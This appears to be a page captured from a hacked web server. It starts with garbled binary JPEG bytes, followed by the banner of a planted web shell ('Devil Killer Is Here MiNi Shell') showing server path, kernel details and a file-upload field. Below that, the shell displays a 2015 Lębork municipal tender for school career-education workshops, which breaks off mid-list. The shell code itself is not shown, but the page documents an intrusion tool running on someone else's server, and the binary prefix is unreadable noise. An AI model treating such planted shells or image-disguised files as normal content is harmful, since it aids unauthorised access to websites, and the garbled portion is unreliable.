JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150311/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150311/53882-N-2015.html

<p class="kh_header"><b>Lębork: organizacja warsztatów edukacyjnych dla uczniów/uczennic lęborskich szkół podstawowych i gimnazjów</b><br>
<b>Numer ogłoszenia: 53882 - 2015; data zamieszczenia: 11.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Lębork , ul. Armii Krajowej 14, 84-300 Lębork, woj. pomorskie, tel. 59 862 42 80, faks 59 862 24 27.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lebork.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> organizacja warsztatów edukacyjnych dla uczniów/uczennic lęborskich szkół podstawowych i gimnazjów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Organizacja warsztatów edukacyjnych mających na celu poznanie specyfiki różnych zawodów dla uczniów: Szkoły Podstawowej nr 3, Szkoły Podstawowej nr 5, Szkoły Podstawowej nr 8, Zespołu Szkół nr 3 (szkoła podstawowa oraz gimnazjum) w Lęborku oraz Gimnazjum 1, Gimnazjum 2 w Lęborku na rok szkolny 2014/2015.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo warunku w tym zakresie.
Ocena spełniania niniejszego warunku będzie dokonana na podstawie załączonego do oferty oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych: metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że odpowiednio ze względu na poszczególne części zamówienia: wykonał (a w przypadku świadczeń okresowych lub ciągłych również wykonuje) należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie przynajmniej jedną usługę w obszarze prowadzenia zajęć edukacyjnych wśród uczniów szkół podstawowych i gimnazjów 
Ocena spełniania niniejszego warunku będzie dokonana na podstawie załączonego do oferty oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych oraz wykazu usług metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo warunku w tym zakresie.
Ocena spełniania niniejszego warunku będzie dokonana na podstawie załączonego do oferty oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych: metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo warunku w tym zakresie.
Ocena spełniania niniejszego warunku będzie dokonana na podstawie załączonego do oferty oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych: metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo warunku w tym zakresie.
Ocena spełniania niniejszego warunku będzie dokonana na podstawie załączonego do oferty oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych: metodą spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca musi dołączyć do oferty propozycje przedstawianych zawodów.
Wykonawca do oferty musi dołączyć scenariusz zajęć wraz z wyszczególnieniem dodatkowych form mających na celu podniesienie efektywności realizowanych zajęć.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - 1.2	Propozycje dodatkowych form mających na celu podniesienie efektywności realizowanych zajęć - 30</li>
<li>3 - 1.3	Liczba zrealizowanych przez Wykonawcę usług w zakresie prowadzenia zajęć edukacyjnych wśród uczniów szkół podstawowych i gimnazjów - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ustawy Prawo zamówień publicznych Zamawiający przewiduje zmianę warunków umowy w formie Aneksu do umowy w następujących przypadkach:
a)	w przypadku zmiany Harmonogramu płatności, który stanowi załącznik do umowy o dofinansowanie może nastąpić zmiana okresu realizacji umowy i jest możliwa wyłącznie za zgodą obu stron umowy;
b)	w przypadku wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony, możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu stron umowy;
c)	w przypadku wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy, możliwa jest zmiana postanowień umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.um.lebork.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Lęborku
ul. Armii Krajowej 14
84-300 Lębork.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.03.2015 godzina 12:00, miejsce: Urząd Miejski w Lęborku
ul. Armii Krajowej 14
84-300 Lębork.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nauka z pasją - wyrównywanie szans edukacyjnych uczniów szkół podstawowych z miasta Lębork oraz Nauka z pasją - wyrównywanie szans edukacyjnych uczniów lęborskich gimnazjów współfinansowanych ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, priorytet IX. Rozwój wykształcenia i kompetencji w regionach, działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Organizacja warsztatów edukacyjnych mających na celu poznanie specyfiki różnych zawodów zawodowych w lęborskich szkołach podstawowych (nr 3, nr 5, nr 8, zespole szkół nr 3).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje: 
1.	W trakcie warsztatów uczestnicy mają spotykać się z przedstawicielami różnych grup zawodowych. Na każdym spotkaniu przedstawiciel danego zawodu (np. żołnierz, farmaceuta, strażak, naukowiec, marynarz, itp.) ma przedstawić specyfikę wykonywanej pracy, zdobywania wiedzy (jaką należy ukończyć szkołę, kurs, itp.) 
i doświadczenia. Uczniowie będą mogli zadawać również nurtujące ich pytania. Zajęcia te mają przyczynić się do wyrównania szans edukacyjnych uczniów. Ponadto dzięki uczestnictwu w zajęciach uczniowie nie tylko mają zdobyć wiedzę (dotyczącą m.in. specyfiki pracy poszczególnych grup zawodowych) i doświadczenie, ale również nabyć dodatkowe umiejętności społeczne (skutecznej komunikacji, asertywności, itp.)
2.	Świadczenie 138 godzin lekcyjnych usług, poprzez organizację warsztatów edukacyjnych mających na celu poznanie specyfiki różnych zawodów od dnia podpisania umowy do 15 czerwca 2015 r.
3.	Łącznie w zajęciach brać będą udział obecni w danym dniu uczniowie poszczególnych szkół. Podział na grupy ma odpowiadać podziałom na klasy. Łącznie ma się odbyć 138 spotkań warsztatowych (46 grup po 3 godziny lekcyjne). Liczba godzin 
w poszczególnych szkołach ma wynosić odpowiednio: SP 3 - 33 godziny, SP 5 - 24 godziny, SP 8 - 54 godziny, ZS 3 (szkoła podstawowa) - 27 godzin. 
4.	Jedno spotkanie powinno trwać 45 minut. Każda klasa musi odbyć co najmniej 3 spotkania. Spotkania muszą być organizowane w odstępie co najmniej tygodniowym (nie dopuszczalne jest prowadzenie np. trzech spotkań w jednym dniu).
5.	Współpracę z dyrekcją szkoły, nauczycielami oraz wychowawcami w każdej szkole.
6.	Współpracę z personelem projektu Nauka z pasją - wyrównywanie szans edukacyjnych uczniów szkół podstawowych z miasta Lębork, koordynatorem projektu oraz specjalistą ds. wdrażania projektu.
7.	Przygotowywanie comiesięcznych raportów określających liczbę uczniów uczestniczących w zajęciach (z podziałem na płeć oraz szkołę), liczbę godzin przeprowadzonych warsztatów (z podziałem na poszczególne szkoły). 

Dodatkowe informacje (wymogi i obowiązki Wykonawcy oraz Zamawiającego):
1.	Wykonawca jest zobowiązany do przeprowadzenia zajęć z każdą grupą / klasą 
w danej szkole (co najmniej 3 spotkania na grupę / klasę). Łącznie 138 h lekcyjnych warsztatów.
2.	Przedstawiane treści muszą być zgodne ze złożoną ofertą oraz dostosowane do wieku uczestników. Wykonawca musi dołączyć do oferty propozycje przedstawianych zawodów.
3.	Wykonawca do oferty musi dołączyć scenariusz zajęć wraz z wyszczególnieniem dodatkowych form mających na celu podniesienie efektywności realizowanych zajęć.
4.	Wykonawca w scenariuszu musi przedstawić propozycje dodatkowych form mających 
na celu podniesienie efektywności realizowanych zajęć (m.in. czy Wykonawca będzie miał przygotowaną prezentację multimedialną, czy w trakcie spotkania odbędzie się pokaz umiejętności - tzw. żywe lekcje, czy będzie wykorzystany ubiór związany 
z wykonywaniem konkretnego zawodu, czy uczestnicy otrzymają materiały dodatkowe, np. ulotki, przedmioty związane z konkretnym zawodem, itp.) - liczba form dodatkowych podlega ocenie.
5.	Zamawiający zastrzega sobie (w związku z finansowaniem ze środków unijnych) oraz instytucjom upoważnionym do przeprowadzenia kontroli, prawo wglądu do dokumentów Wykonawcy związanych z realizowaniem zamówienia, w tym dokumentów finansowych. Zamawiający zastrzega również, iż ma prawo do kontroli przeprowadzanych zajęć.
6.	Usługi należy przeprowadzić w dni robocze dla: Szkoły Podstawowej nr 3, Szkoły Podstawowej nr 5, Szkoły Podstawowej nr 8, Zespołu Szkół nr 3 (szkoła podstawowa) w Lęborku, w trakcie godzin lekcyjnych, również po obowiązkowych godzinach lekcyjnych. Terminy i godziny dostosowane będą do najbardziej pożądanych przez odbiorców. 
7.	Wykonawca zobowiązuje się do prawidłowego i systematycznego prowadzenia dokumentacji projektu oraz comiesięcznego przekazywania sprawozdań w formie elektronicznej lub papierowej na adres a.lawniczak@www.lebork.pl o stanie realizacji planu zajęć, w tym ilości zrealizowanych godzin.
8.	Harmonogram zajęć należy ustalić z dyrekcją szkół. Zaakceptowane przez dyrektorów harmonogramy należy przedstawić Zamawiającemu w ciągu 10 dni po podpisaniu umowy.
9.	Zamawiający udostępni Wykonawcy nieodpłatnie pomieszczenia niezbędne do wykonania zamówienia. Materiały papiernicze i inne konieczne do realizacji warsztatów Wykonawca zapewni we własnym zakresie. 
10.	W ramach projektu nie przewiduje się przyznawania uczestnikom stypendiów i zwrotów kosztów dojazdu. 
11.	Wykonawca ponosi pełną odpowiedzialność za uczniów w czasie trwania zajęć.
12.	Wykonawca jest odpowiedzialny za jakość oferowanych usług, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia.
13.	Wymagana jest należyta staranność przy realizacji zobowiązań umowy.
14.	Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę i uczestników lub uczestniczki podczas realizacji przedmiotu zamówienia.
15.	Wykonawca zobowiązany jest również do:
- tworzenia list obecności na zajęciach, 
- sporządzania dokumentacji fotograficznej ze zrealizowanych działań - minimum 3 zdjęcia z każdych zajęć (w każdej szkole, w każdej grupie) do końca każdego miesiąca i przesyłania ich na adres: a.lawniczak@www.lebork.pl lub dostarczania osobiście na płycie CD/DVD Zamawiającemu
- odpowiedniego oznaczenia wszystkich miejsc i dokumentów bezpośrednio związanych 
z realizacją warsztatów, tj. korespondencji dotyczącej Projektu i wszystkich innych dokumentów z nim związanych wychodzących od Wykonawcy logotypów Unii Europejskiej oraz Programu Operacyjnego Kapitał Ludzki wraz z zamieszczeniem napisu o współfinansowaniu przedmiotu zamówienia ze środków Unii Europejskiej zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki (zgodnie z wytycznymi w zakresie informacji i promocji, które zamieszczone są na stronie internetowej: www.efs.gov.pl).  Dodatkowo wszystkie dokumenty i materiały muszą zostać oznaczone logotypem miasta (Wybierz Lębork), który zostanie udostępniony przez Zamawiającego po podpisaniu umowy.
 16. Wykonawcy za wykonanie przedmiotu umowy przysługuje wynagrodzenie zgodne 
z przedstawioną ofertą. Zapłata nastąpi w terminie, nie później niż 30 dni od dnia doręczenia Zamawiającemu prawidłowo wystawionej faktury/rachunku oraz innej wymaganej przez Zamawiającego dokumentacji:
a)	listy obecności uczestników (każda grupa osobna lista)
b)	protokół odbioru zawierający okres realizacji, tematy przeprowadzonych zajęć, godziny ich odbywania i liczbę zrealizowanych godzin,
c)	zestawienie przeprowadzonych zajęć (osobne dla każdej szkoły, z podziałem na grupy wraz z datami poszczególnych spotkań)
d)	dokumentację fotograficzną ze zrealizowanych warsztatów - minimum 3 zdjęcia 
z każdych zajęć (w każdej szkole, w każdej grupie)  
Wypłata wynagrodzenia nastąpi nie wcześniej niż po otrzymaniu transzy dotacji, zgodnie z harmonogramem płatności stanowiącym załącznik do umowy o dofinansowanie projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Propozycje dodatkowych form mających na celu podniesienie efektywności realizowanych zajęć - 30</li>
<li>3. Liczba zrealizowanych przez Wykonawcę usług w zakresie prowadzenia zajęć edukacyjnych wśród uczniów szkół podstawowych i gimnazjów - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Organizacja warsztatów edukacyjnych mających na celu poznanie specyfiki różnych zawodów w lęborskich gimnazjach (nr 1, nr 2, zespole szkół nr 3).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje: 
1.	W trakcie warsztatów uczestnicy mają spotykać się z przedstawicielami różnych grup zawodowych. Na każdym spotkaniu przedstawiciel danego zawodu (np. żołnierz, farmaceuta, strażak, naukowiec, marynarz, itp.) ma przedstawić specyfikę wykonywanej pracy, zdobywaniu wiedzy (jaką należy ukończyć szkołę, kurs, itp.) i doświadczenia. Uczniowie będą mogli zadawać również nurtujące ich pytania. Zajęcia te mają przyczynić się do wyrównania szans edukacyjnych uczniów. Ponadto dzięki uczestnictwu w zajęciach uczniowie nie tylko mają zdobyć wiedzę (dotyczącą m.in. specyfiki pracy poszczególnych grup zawodowych) i doświadczenie oraz nabyć dodatkowe umiejętności społeczne (skutecznej komunikacji, asertywności, itp.)
2.	Świadczenie 120 godzin lekcyjnych usług, poprzez organizację warsztatów edukacyjnych mających na celu poznanie specyfiki różnych zawodów od dnia podpisania umowy do 15 czerwca 2015 r., 
3.	Łącznie w zajęciach brać będą udział obecni w danym dniu uczniowie poszczególnych szkół. Podział na grupy ma odpowiadać podziałom na klasy. Łącznie ma się odbyć 120 spotkań warsztatowych (40 grup po 3 godziny lekcyjne). Liczba godzin w poszczególnych szkołach ma wynosić odpowiednio: GIM 1 - 48 godzin, GIM 2 - 48 godzin, ZS 3 (gimnazjum) - 24 godziny.
4.	Jedno spotkanie ma trwać 45 minut. Każda klasa musi odbyć co najmniej 3 spotkania. Spotkania muszą być organizowane w odstępie co najmniej tygodniowym (nie dopuszczalne jest prowadzenie trzech spotkań w jednym dniu).
5.	Współpracę z dyrekcją szkoły, nauczycielami oraz wychowawcami w każdej szkole.
6.	Współpracę z personelem projektu Nauka z pasją - wyrównywanie szans edukacyjnych uczniów lęborskich gimnazjów, koordynatorem projektu oraz specjalistą ds. wdrażania projektu.
7.	Przygotowywanie comiesięcznych raportów określających liczbę uczniów uczestniczących w zajęciach (z podziałem na płeć oraz szkołę), liczbę godzin przeprowadzonych warsztatów (z podziałem na poszczególne szkoły). 

Dodatkowe informacje (wymogi i obowiązki Wykonawcy oraz Zamawiającego):
1.	Wykonawca jest zobowiązany do przeprowadzenia zajęć z każdą grupą / klasą w danej szkole (co najmniej 3 spotkania na grupę / klasę). Łącznie 120 h lekcyjnych warsztatów.
2.	Przedstawiane treści muszą być zgodne ze złożoną ofertą oraz dostosowane do wieku uczestników. Wykonawca musi dołączyć do oferty propozycje przedstawianych zawodów.
3.	Wykonawca do oferty musi dołączyć scenariusz zajęć wraz z wyszczególnieniem dodatkowych form mających na celu podniesienie efektywności realizowanych zajęć.
4.	Wykonawca w scenariuszu musi przedstawić propozycje dodatkowych form mających 
